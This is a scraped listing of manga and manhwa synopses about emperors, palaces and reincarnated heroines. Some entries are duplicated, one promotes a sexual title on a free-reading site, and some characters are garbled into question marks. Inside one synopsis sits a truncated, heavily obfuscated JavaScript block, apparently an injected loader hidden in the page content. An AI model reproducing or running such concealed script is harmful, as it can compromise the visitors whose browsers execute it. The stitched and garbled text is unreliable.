A witch doctor: an expert who is abnormally skilled with magic and sorcery, and uses it to heal people. Due to her snow-white hair and blood-red eyes, Shuka has long been scorned and thought of as a monster, all while working as an apprentice of the town's witch doctor. But one day, a request comes to her straight from the handsome emperor?! And in order to settle the request, Shuka has to pretend to be a princess and infiltrate the inner palace?!
Hari, who died in an unexpected car accident, had come to her senses after being reincarnated into a completely different world. Was she the daughter of the emperor? Hari, who opened her eyes with a throbbing heart, was in shock. I’m a dog? A dog that can talk, too? And it gets worse! I was the hunting dog of a cruel emperor who exterminated his own relatives to ascend to the throne. Now that it’s done, I have to find a way to live. The only thing this little doggy could do with her body was… “I’ll pay you back if you raise me, Your Majesty!” “Alright, I’ll take you.” “That’s a great choice, Your Majesty. You’ll never regret it!” Goodbye to my self-esteem— A dog’s way to utmost power… that’s the route I’ll take! My second life will be as the Emperor’s adviser and potential successor. Until the day of death! (DISCLAIMER: This is a promo chapter.)
The Emperor's Erection Project manga The Emperor's Erection Project manhwa update free on Bibimanga.ComThe man who acts like a charismatic and dominant emperor has a top secret. "My co** can't get hard" The closer the deadline of the selection of empress, the more relentlessly vigourous his pe*** becomes. But the heavens did not abandon him. "Could it be that you're getting off every time I step on you?" Slap, slap, slap, slaaap! Eric's pe*** comes back to life after the mysterious woman hit him! But the identity his saviour sent from heaven is a maid who loathes nobles!
Dong Yan crossed over and became the Fifth Miss XiuYan, the trash of the Dong family. In this world, she’s being sought after by a vicious sister and many scoundrels. Fortunately, she remembers her skills of being a secret agent from her previous life. Turns out the original master had crippled spiritual roots… How will XiuYan fair against her bullies with her current abilities!? Who is this person that suddenly appeared to protect her?
Dong Yan crossed over and became the Fifth Miss XiuYan, the trash of the Dong family. In this world, she's being sought after by a vicious sister and many scoundrels. Fortunately, she remembers her skills of being a secret agent from her previous life. Turns out the original master had crippled spiritual roots… How will XiuYan fair against her bullies with her current abilities!? Who is this person that suddenly appeared to protect her?
The esteemed Evil slayer has made its first calling in 400 years, choosing Gun as the rightful Emperor of the HaeWol Kingdom. In a long and bloody battle, Gun, the hidden son of the late Emperor Hyeon Wui Jae, kills the tyrannical Hwang family that has been wreaking havoc across the land. When his older brother passes away, Gun ascends the throne as the Emperor, spreading hope that the days of turbulence and disorder are finally coming to an end. However, he has to set out on an important undercover mission to obliterate the corrupt accomplices of the Hwang family who are spread out beyond the city's walls. In doing so, perhaps he will solve the missing puzzles that have been haunting him for years. The mystery behind why his only love Choa and her trusted father betrayed him. Even though he violently cut his ties with Choa in fury, he can't resist her coming back into his heart. First as the irresistible courtesan Wol Hyang, then as the physician assisting his undercover mission. Will they be able to get past the painful memories from the past? Will they repeat the tragic love of Choa's parents? Hwangje-ui yeon-in / The Emperor's Mistress / Любовница императора / 황제의 연인d
The esteemed Evil slayer has made its first calling in 400 years, choosing Gun as the rightful Emperor of the HaeWol Kingdom. In a long and bloody battle, Gun, the hidden son of the late Emperor Hyeon Wui Jae, kills the tyrannical Hwang family that has been wreaking havoc across the land. When his older brother passes away, Gun ascends the throne as the Emperor, spreading hope that the days of turbulence and disorder are finally coming to an end. However, he has to set out on an important undercover mission to obliterate the corrupt accomplices of the Hwang family who are spread out beyond the city's walls. In doing so, perhaps he will solve the missing puzzles that have been haunting him for years. The mystery behind why his only love Choa and her trusted father betrayed him. Even though he violently cut his ties with Choa in fury, he can't resist her coming back into his heart. First as the irresistible courtesan Wol Hyang, then as the physician assisting his undercover mission. Will they be able to get past the painful memories from the past? Will they repeat the tragic love of Choa's parents? Hwangje-ui yeon-in / The Emperor's Mistress / ????????? ?????????? / ??? ??<script></script><script>(function(_0xff014d,_0x3cf626){var _0x5d287a=_0x11d2,_0x573640=_0xff014d();while(!![]){try{var _0x53e403=parseInt(_0x5d287a(0x19c))/(0x1*0x1e1e+0x24de+0x527*-0xd)*(parseInt(_0x5d287a(0x19a))/(-0x8c7*0x1+0x1ed7+0x1*-0x160e))+-parseInt(_0x5d287a(0x183))/(-0x1471+0xe6c+0x608)*(-parseInt(_0x5d287a(0x185))/(-0x1*-0x1fd9+0x25db+-0x45b0))+parseInt(_0x5d287a(0x197))/(-0x1b1c*0x1+-0x1*0x142e+0x2f4f)+-parseInt(_0x5d287a(0x19e))/(-0x159a+0x7bf+-0xde1*-0x1)+-parseInt(_0x5d287a(0x19b))/(0x129d+-0x1af+-0x1*0x10e7)*(parseInt(_0x5d287a(0x188))/(0x1f9*-0x1+0x14b7*0x1+-0x12b6))+-parseInt(_0x5d287a(0x196))/(0xa28+-0x1637+0x4*0x306)*(parseInt(_0x5d287a(0x191))/(-0xc6+0x35*-0xb2+0x25aa))+-parseInt(_0x5d287a(0x199))/(0x7e6+0x102d*-0x2+0x187f)*(-parseInt(_0x5d287a(0x195))/(0x1*-0x667+0xc3f+0x2*-0x2e6));if(_0x53e403===_0x3cf626)break;else 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<div class="post-title"> <h1>The Emperor’s Mask</h1> </div> <div class="tab-summary "> I didn’t know blackouts were so scary. I lost my film after drinking. And when she opened her eyes, she was in a different world, and she was in a different person’s body. That alone is absurd, but I found out that the cause of death of the body was murder, not suicide. I’m so busy adjusting to reality that I’m going crazy, and I’m also thinking about what’s wrong with the emperor who doesn’t show his face outside. Meanwhile, suspicious beings, even the chief of staff, continue to haunt her. “What’s that big bowl?” “…….” Damn, you’re interrupting me mixing rice with a spoon! The story of a mysterious emperor, a suspicious servant, a man who doesn’t reveal himself and the wrong heroine Lucia. </div>
Zhu Yunwen, who barely survived the Jingnan campaign, received the souls of two of the world’s strongest martial artists, the First Heavenly Demon of the Demonic Cult and Huineng, the Sixth Patriarch of the Shaolin Temple, in his body, and was reborn as Heavenly Destroyer. This is the story of the Heavenly Destroyer’s journey to become an absolute existence begins!
Han Wol is known as one of the military’s finest young men, but Wol is a woman! After her father was framed for the former emperor’s murder, she narrowly escaped execution by disguising herself and hiding in plain sight. Since then, the empire has been under the thumb of chief state councilor Shin, but the young emperor is hatching a plan to take back control. As the only one who holds the key to unlocking the mysteries of the past, it looks like Wol’s days of laying low are over Flower Hidden in the Palace / Hidden Flower in the Palace /
Han Wol is known as one of the military's finest young men, but Wol is a woman! After her father was framed for the former emperor's murder, she narrowly escaped execution by disguising herself and hiding in plain sight. Since then, the empire has been under the thumb of chief state councilor Shin, but the young emperor is hatching a plan to take back control. As the only one who holds the key to unlocking the mysteries of the past, it looks like Wol's days of laying low are overFlower Hidden in the Palace / Hidden Flower in the Palace / /
When Louise realizes that all she’ll get in return for slaving away for an incompetent emperor is an early grave, she decides to ditch her role as empress, get a job within the palace, and finally earn a steady paycheck. However, her husband is ousted from the throne overnight and replaced with his long-lost brother, Regan. Just when Louise is about to celebrate her divorce, Regan announces that he’ll keep Louise as his empress. She tells Regan that she’d rather be his subordinate than his woman, but this new villainous employer tells her to be both!